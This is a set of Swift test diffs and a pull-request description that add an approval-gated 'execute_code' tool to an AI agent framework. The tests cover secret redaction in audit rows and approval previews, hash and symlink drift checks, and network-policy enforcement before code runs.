+extension ExecuteCodeToolTests {
+  /// The audit path records `canonicalArgsJSON` verbatim and later redacts it with `ExfilArgGuard`.
+  /// For the largest legal payload — a full 16 KiB code body plus the maximum staged-file count —
+  /// the recorded JSON and its redaction must stay bounded (the regex shape-scan cannot explode),
+  /// the redactor must strip an embedded secret, and the recorded JSON must be deterministic and
+  /// structurally intact so the audit redacts exactly the action the approval stored.
+  @Test func maxPayloadAuditRedactionStaysBoundedDeterministicAndIntact() async throws {
+    // given
+    let workspace = try makeWorkspace()
+    let stagePaths = (0..<ExecuteCodeTool.maxStagedFiles).map { index in
+      "stage-\(index).txt"
+    }
+    for path in stagePaths {
+      try write(Data("x".utf8), relativePath: path, workspace: workspace)
+    }
+    let secret = "approval-secret-value"
+    let filler = String(repeating: "a", count: ExecuteCodeTool.maxCodeBytes - secret.utf8.count)
+    let code = secret + filler
+    let tool = makeTool(workspace: workspace)
+    let guardrail = ExfilArgGuard(secretValues: [secret])
+
+    // when
+    let action = try await prepared(
+      tool.prepareAction(arguments: arguments(code: code, stage: stagePaths))
+    )
+    let redacted = guardrail.renderRedacted(argsJSON: action.canonicalArgsJSON)
+    let replayed = try await prepared(
+      tool.prepareAction(arguments: arguments(code: code, stage: stagePaths))
+    )
+
+    // then
+    // (a) bounded: the 16 KiB body plus 16 stage objects of metadata stays comfortably under a
+    // ceiling derived from the tool's caps, and redaction only rewrites matched spans in place.
+    let recordedCeiling = ExecuteCodeTool.maxCodeBytes + ExecuteCodeTool.maxStagedFiles * 2048
+    #expect(code.utf8.count == ExecuteCodeTool.maxCodeBytes)
+    #expect(action.canonicalArgsJSON.utf8.count <= recordedCeiling)
+    #expect(redacted.utf8.count <= action.canonicalArgsJSON.utf8.count * 2)
+    // (a) the redactor completes and actually removes the embedded secret.
+    #expect(action.canonicalArgsJSON.contains(secret))
+    #expect(redacted.contains(secret) == false)
+    // (b) the redacted row is still structurally intact JSON with every stage entry present.
+    let decoded = try #require(JSONValue.parse(redacted)?.objectValue)
+    guard case .array(let stages) = decoded["stage"] else {
+      Issue.record("redacted stage was not an array")
+      return
+    }
+    #expect(stages.count == ExecuteCodeTool.maxStagedFiles)
+    for stage in stages {
+      let object = try #require(stage.objectValue)
+      #expect(object["path"] != nil)
+      #expect(object["realpath"] != nil)
+      #expect(object["bytes"]?.numberValue != nil)
+      #expect(object["sha256"]?.stringValue?.count == 64)
+    }
+    // (b) re-preparing the identical inputs records byte-identical canonical JSON.
+    #expect(replayed.canonicalArgsJSON == action.canonicalArgsJSON)
+  }
+}

--- a/Tests/ClawToolsTests/Tools/ExecuteCodeToolTests.swift
+++ b/Tests/ClawToolsTests/Tools/ExecuteCodeToolTests.swift
@@ -459,12 +459,13 @@ extension ExecuteCodeToolTests {
     #expect(request.language == .python)
     #expect(request.entrypoint.name == ".clawd-entrypoint.py")
     #expect(request.entrypoint.mode == .readExecute)
-    #expect(String(decoding: request.entrypoint.bytes, as: UTF8.self).contains("/work/input.txt"))
+    let entrypointText = try #require(String(bytes: request.entrypoint.bytes, encoding: .utf8))
+    #expect(entrypointText.contains("/work/input.txt"))
     #expect(request.inputs.map(\.name) == ["input.txt"])
     #expect(request.inputs.map(\.mode) == [.readOnly])
     #expect(
       request.inputs.map { input in
-        String(decoding: input.bytes, as: UTF8.self)
+        String(bytes: input.bytes, encoding: .utf8)
       } == ["input"]
     )
     #expect(request.network)

--- a/Tests/ClawToolsTests/Tools/ExecuteCodeToolTests.swift
+++ b/Tests/ClawToolsTests/Tools/ExecuteCodeToolTests.swift
@@ -80,6 +80,30 @@ import Testing
     return true
   }
 
+  private func recordedInvocation(
+    tool: ExecuteCodeTool,
+    arguments: JSONValue
+  ) async throws -> (JSONValue, String) {
+    let action = try await prepared(tool.prepareAction(arguments: arguments))
+    let recorded = try #require(JSONValue.parse(action.canonicalArgsJSON))
+    return (recorded, action.canonicalTarget)
+  }
+
+  private func result(
+    termination: ExecTermination,
+    stdout: String = "",
+    stderr: String = "",
+    truncated: Bool = false
+  ) -> ExecutionResult {
+    ExecutionResult(
+      terminationReason: termination,
+      stdout: stdout,
+      stderr: stderr,
+      truncatedRawBytes: truncated,
+      wallClock: .milliseconds(20)
+    )
+  }
+
   private struct PreparationFailure: Error {}
 }
 
@@ -402,5 +426,287 @@ extension ExecuteCodeToolTests {
     #expect(action.presentation.blastRadius.contains("egress: yes"))
     #expect(action.presentation.warnings.count == 1)
     #expect(action.presentation.warnings[0].contains("send data out"))
+  }
+}
+
+extension ExecuteCodeToolTests {
+  @Test func executeRevalidatesAndSendsOnlyRecordedCopies() async throws {
+    // given
+    let workspace = try makeWorkspace()
+    try write(Data("input".utf8), relativePath: "notes/input.txt", workspace: workspace)
+    let backend = FakeExecutionBackend(
+      results: [result(termination: .exited(code: 0), stdout: "done")]
+    )
+    let tool = makeTool(workspace: workspace, backend: backend, allowEgress: true)
+    let (recorded, target) = try await recordedInvocation(
+      tool: tool,
+      arguments: arguments(
+        language: "python",
+        code: "print(open('/work/input.txt').read())",
+        stage: ["notes/input.txt"],
+        network: true
+      )
+    )
+
+    // when
+    let payload = await tool.execute(arguments: recorded, canonicalTarget: target)
+    let requests = await backend.recordedRequests()
+
+    // then
+    #expect(payload.status == .ok)
+    #expect(requests.count == 1)
+    let request = try #require(requests.first)
+    #expect(request.language == .python)
+    #expect(request.entrypoint.name == ".clawd-entrypoint.py")
+    #expect(request.entrypoint.mode == .readExecute)
+    #expect(String(decoding: request.entrypoint.bytes, as: UTF8.self).contains("/work/input.txt"))
+    #expect(request.inputs.map(\.name) == ["input.txt"])
+    #expect(request.inputs.map(\.mode) == [.readOnly])
+    #expect(
+      request.inputs.map { input in
+        String(decoding: input.bytes, as: UTF8.self)
+      } == ["input"]
+    )
+    #expect(request.network)
+    #expect(request.timeout == .seconds(30))
+  }
+
+  @Test func contentDriftFailsBeforeBackend() async throws {
+    // given
+    let workspace = try makeWorkspace()
+    try write(Data("approved".utf8), relativePath: "input.txt", workspace: workspace)
+    let backend = FakeExecutionBackend(results: [result(termination: .exited(code: 0))])
+    let tool = makeTool(workspace: workspace, backend: backend)
+    let (recorded, target) = try await recordedInvocation(
+      tool: tool,
+      arguments: arguments(stage: ["input.txt"])
+    )
+    try write(Data("tampered".utf8), relativePath: "input.txt", workspace: workspace)
+
+    // when
+    let payload = await tool.execute(arguments: recorded, canonicalTarget: target)
+
+    // then
+    #expect(payload.status == .error)
+    #expect(payload.content.contains("approved bytes"))
+    #expect(await backend.recordedRequests().isEmpty)
+  }
+
+  @Test func symlinkRealpathDriftFailsBeforeBackend() async throws {
+    // given
+    let workspace = try makeWorkspace()
+    try write(Data("first".utf8), relativePath: "first.txt", workspace: workspace)
+    try write(Data("second".utf8), relativePath: "second.txt", workspace: workspace)
+    let link = workspace.root.appendingPathComponent("input.txt")
+    try FileManager.default.createSymbolicLink(
+      at: link,
+      withDestinationURL: workspace.root.appendingPathComponent("first.txt")
+    )
+    let backend = FakeExecutionBackend(results: [result(termination: .exited(code: 0))])
+    let tool = makeTool(workspace: workspace, backend: backend)
+    let (recorded, target) = try await recordedInvocation(
+      tool: tool,
+      arguments: arguments(stage: ["input.txt"])
+    )
+    try FileManager.default.removeItem(at: link)
+    try FileManager.default.createSymbolicLink(
+      at: link,
+      withDestinationURL: workspace.root.appendingPathComponent("second.txt")
+    )
+
+    // when
+    let payload = await tool.execute(arguments: recorded, canonicalTarget: target)
+
+    // then
+    #expect(payload.status == .error)
+    #expect(payload.content.contains("approved target"))
+    #expect(await backend.recordedRequests().isEmpty)
+  }
+
+  @Test func changedCanonicalTargetFailsBeforeBackend() async throws {
+    // given
+    let workspace = try makeWorkspace()
+    let backend = FakeExecutionBackend(results: [result(termination: .exited(code: 0))])
+    let tool = makeTool(workspace: workspace, backend: backend)
+    let (recorded, _) = try await recordedInvocation(tool: tool, arguments: arguments())
+
+    // when
+    let payload = await tool.execute(
+      arguments: recorded,
+      canonicalTarget: "code_exec:python:ffffffffffffffff"
+    )
+
+    // then
+    #expect(payload.status == .error)
+    #expect(await backend.recordedRequests().isEmpty)
+  }
+
+  @Test func rawArgumentsCannotCrossTheRecordedResumeSeam() async throws {
+    // given
+    let workspace = try makeWorkspace()
+    let backend = FakeExecutionBackend(results: [result(termination: .exited(code: 0))])
+    let tool = makeTool(workspace: workspace, backend: backend)
+
+    // when
+    let payload = await tool.execute(
+      arguments: arguments(),
+      canonicalTarget: "code_exec:python:0123456789abcdef"
+    )
+
+    // then
+    #expect(payload.status == .error)
+    #expect(payload.content.contains("unreadable"))
+    #expect(await backend.recordedRequests().isEmpty)
+  }
+
+  @Test func networkPolicyDriftFailsBeforeBackend() async throws {
+    // given
+    let workspace = try makeWorkspace()
+    let preparingTool = makeTool(workspace: workspace, allowEgress: true)
+    let (recorded, target) = try await recordedInvocation(
+      tool: preparingTool,
+      arguments: arguments(network: true)
+    )
+    let backend = FakeExecutionBackend(results: [result(termination: .exited(code: 0))])
+    let executingTool = makeTool(workspace: workspace, backend: backend, allowEgress: false)
+
+    // when
+    let payload = await executingTool.execute(arguments: recorded, canonicalTarget: target)
+
+    // then
+    #expect(payload.status == .error)
+    #expect(payload.content.contains("no longer enabled"))
+    #expect(await backend.recordedRequests().isEmpty)
+  }
+}
+
+extension ExecuteCodeToolTests {
+  @Test func exitedResultRedactsLabelsNoticesAndCapsOnce() async throws {
+    // given
+    let workspace = try makeWorkspace()
+    let stdoutSecret = "stdout-secret-value"
+    let boundarySecret = String(repeating: "boundary-secret-value-", count: 20)
+    let boundaryPrefix = String(repeating: "x", count: ToolOutputCap.maxGraphemes - 200)
+    let overflowTail = String(repeating: "y", count: 1_000)
+    let backend = FakeExecutionBackend(
+      results: [
+        result(
+          termination: .exited(code: 7),
+          stdout: "stdout \(stdoutSecret)",
+          stderr: boundaryPrefix + boundarySecret + overflowTail,
+          truncated: true
+        )
+      ]
+    )
+    let tool = makeTool(
+      workspace: workspace,
+      backend: backend,
+      secrets: [stdoutSecret, boundarySecret]
+    )
+    let (recorded, target) = try await recordedInvocation(tool: tool, arguments: arguments())
+
+    // when
+    let payload = await tool.execute(arguments: recorded, canonicalTarget: target)
+
+    // then
+    #expect(payload.status == .ok)
+    #expect(payload.ingestedUntrusted)
+    #expect(payload.readPrivateData == false)
+    #expect(payload.content.contains("exit 7"))
+    #expect(payload.content.contains("--- stdout ---"))
+    #expect(payload.content.contains("--- stderr ---"))
+    #expect(payload.content.contains(stdoutSecret) == false)
+    #expect(payload.content.contains(String(boundarySecret.prefix(32))) == false)
+    #expect(
+      payload.content.components(separatedBy: SecretRedactor.replacement).count - 1 == 2
+    )
+    #expect(payload.content.components(separatedBy: ToolOutputCap.truncationMarker).count - 1 == 1)
+  }
+
+  @Test func rawPrefixOverflowGetsOneNoticeBeforeTheSingleCap() async throws {
+    // given
+    let workspace = try makeWorkspace()
+    let backend = FakeExecutionBackend(
+      results: [result(termination: .exited(code: 0), stdout: "short", truncated: true)]
+    )
+    let tool = makeTool(workspace: workspace, backend: backend)
+    let (recorded, target) = try await recordedInvocation(tool: tool, arguments: arguments())
+
+    // when
+    let payload = await tool.execute(arguments: recorded, canonicalTarget: target)
+
+    // then
+    #expect(
+      payload.content.components(separatedBy: ExecuteCodeTool.rawOutputTruncationNotice).count - 1
+        == 1
+    )
+    #expect(payload.content.contains(ToolOutputCap.truncationMarker) == false)
+  }
+
+  @Test func exit137IsSuccessfulAndCarriesTheMemoryHint() async throws {
+    // given
+    let workspace = try makeWorkspace()
+    let backend = FakeExecutionBackend(results: [result(termination: .exited(code: 137))])
+    let tool = makeTool(workspace: workspace, backend: backend)
+    let (recorded, target) = try await recordedInvocation(tool: tool, arguments: arguments())
+
+    // when
+    let payload = await tool.execute(arguments: recorded, canonicalTarget: target)
+
+    // then
+    #expect(payload.status == .ok)
+    #expect(payload.ingestedUntrusted)
+    #expect(payload.content.contains("memory cap"))
+  }
+
+  @Test func infrastructureAndCancellationResultsHaveNoNewProvenance() async throws {
+    // given
+    let workspace = try makeWorkspace()
+    try write(Data("private".utf8), relativePath: "MEMORY.md", workspace: workspace)
+    let secret = "backend-control-secret"
+    let terminations: [ExecTermination] = [
+      .timedOutKilled,
+      .cancelled,
+      .startFailed(reason: "engine failed \(secret)"),
+      .unavailable(reason: "engine unavailable \(secret)"),
+    ]
+
+    for termination in terminations {
+      let backend = FakeExecutionBackend(results: [result(termination: termination)])
+      let tool = makeTool(workspace: workspace, backend: backend, secrets: [secret])
+      let (recorded, target) = try await recordedInvocation(
+        tool: tool,
+        arguments: arguments(stage: ["MEMORY.md"])
+      )
+
+      // when
+      let payload = await tool.execute(arguments: recorded, canonicalTarget: target)
+
+      // then
+      #expect(payload.status == .error)
+      #expect(payload.ingestedUntrusted == false)
+      #expect(payload.readPrivateData == false)
+      #expect(payload.content.contains(secret) == false)
+    }
+  }
+
+  @Test func successfulPrivateStagePropagatesPrivateData() async throws {
+    // given
+    let workspace = try makeWorkspace()
+    try write(Data("private".utf8), relativePath: "MEMORY.md", workspace: workspace)
+    let backend = FakeExecutionBackend(results: [result(termination: .exited(code: 0))])
+    let tool = makeTool(workspace: workspace, backend: backend)
+    let (recorded, target) = try await recordedInvocation(
+      tool: tool,
+      arguments: arguments(stage: ["MEMORY.md"])
+    )
+
+    // when
+    let payload = await tool.execute(arguments: recorded, canonicalTarget: target)
+
+    // then
+    #expect(payload.status == .ok)
+    #expect(payload.ingestedUntrusted)
+    #expect(payload.readPrivateData)
   }
 }

--- a/Tests/ClawToolsTests/Tools/ExecuteCodeToolTests.swift
+++ b/Tests/ClawToolsTests/Tools/ExecuteCodeToolTests.swift
@@ -769,3 +769,30 @@ extension ExecuteCodeToolTests {
     #expect(replayed.canonicalArgsJSON == action.canonicalArgsJSON)
   }
 }
+
+extension ExecuteCodeToolTests {
+  @Test func stagedPathsAreRedactedInTheApprovalPreview() async throws {
+    // given — a loaded secret value embedded in a staged file's own path
+    let workspace = try makeWorkspace()
+    let secret = "s3cr3t-path-token-abcdef"
+    let relativePath = "notes/\(secret)/input.txt"
+    try write(Data("data".utf8), relativePath: relativePath, workspace: workspace)
+    let tool = makeTool(workspace: workspace, secrets: [secret])
+
+    // when
+    let action = try await prepared(tool.prepareAction(arguments: arguments(stage: [relativePath])))
+    let preview = try #require(action.presentation.contentPreview)
+    let recorded = try #require(JSONValue.parse(action.canonicalArgsJSON)?.objectValue)
+    guard case .array(let stages) = recorded["stage"], let stage = stages.first?.objectValue else {
+      Issue.record("recorded stage missing")
+      return
+    }
+
+    // then — the owner-facing preview never leaks the secret from the path or realpath
+    #expect(preview.contains(secret) == false)
+    #expect(preview.contains(SecretRedactor.replacement))
+    // ...while the canonical action keeps the true path and realpath for hash binding and resume.
+    #expect(stage["path"]?.stringValue == relativePath)
+    #expect(stage["realpath"]?.stringValue?.contains(secret) == true)
+  }
+}


### PR DESCRIPTION
## What this adds

`execute_code`, the first `dangerous`-tier tool, plus the generic dangerous-approval gate it needs. The owner sees and approves the complete redacted script and every staged input before anything runs; the tool records exactly what it authorized, revalidates it after approval, and maps the result through the fake `ExecutionBackend`. The real apple/container backend and production registration land in follow-up work. The tool is not registered on the wire yet.

## How it works

- **Prepared dangerous actions.** A new `PreparedToolAction`/`PreparedActionResolution` seam lets a dangerous tool prepare, scan, and bind the exact action at gate time. `ToolPolicyGate.evaluate` becomes a total async switch: `ask` and `safe` keep their existing paths; `dangerous` can only consume a tool-produced prepared action and always parks a durable approval, with `exec.enabled` as a second fail-closed guard.
- **Bound content scans.** `ExfilArgGuard` gains a reusable text path and a precomputed private-window index, so code and decoded staged bytes get the same exact-secret and shape scans as argument JSON. The private MEMORY/USER substring tier runs only when the call can exfiltrate.
- **`ExecuteCodeTool`.** Reads staged files stat-first under bounded caps (16 KiB code, 1 MiB/file, 4 MiB total, 16 files), resolves workspace containment, flattens basenames under NFC + case folding, and records a canonical replacement JSON carrying each stage's realpath, size, and SHA-256. The approval preview renders the complete redacted script and every staged row, chunk-safe across Telegram messages. At execution it re-resolves and re-hashes every input against what was approved and refuses on any drift before touching the backend.

## Also in here

Three follow-ups from the previous review, folded in:

- Split the exec config out of `AppConfig.swift` into its own file (public API unchanged) to clear the file-length warning without suppressing it.
- A test that the `execute_code` audit row and its redaction stay bounded and deterministic for a maximum-size payload.
- A test that `/new` supersede and session detaint commit in one transaction, locking the invariant the provenance state-guard depends on.

And a memory fix: the private-window index now stores each source once instead of one array per window.

## Testing

Full suite green (1155 tests, 180 suites), `scripts/lint.sh` clean. Every commit is test-first; per-task reviews and a final whole-branch review found no blocking issues. The real-backend acceptance suite stays skipped until the container backend lands.
